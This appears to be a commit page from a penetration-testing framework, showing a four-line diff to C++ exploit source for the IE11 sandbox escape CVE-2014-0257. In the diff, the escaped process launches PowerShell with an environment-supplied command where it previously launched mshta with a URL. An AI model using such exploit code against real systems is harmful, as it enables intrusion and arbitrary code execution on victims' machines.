Skip to content

Commit 443f9f1

Browse files
committed
Update IE11Sandbox exploit source
1 parent 43699b1 commit 443f9f1

File tree

1 file changed

+2
-2
lines changed

1 file changed

+2
-2
lines changed

external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -165,8 +165,8 @@ void DoDfsvcExploit()
165165
{
166166
std::vector<variant_t> startArgs;
167167

168-
startArgs.push_back(L"mshta");
169-
startArgs.push_back(GetEnv(L"MYURL"));
168+
startArgs.push_back(L"powershell");
169+
startArgs.push_back(GetEnv(L"PSHCMD"));
170170

171171
ExecuteMethod<mscorlib::_ObjectPtr>(startMethod, startArgs);
172172
}

0 commit comments

Comments
 (0)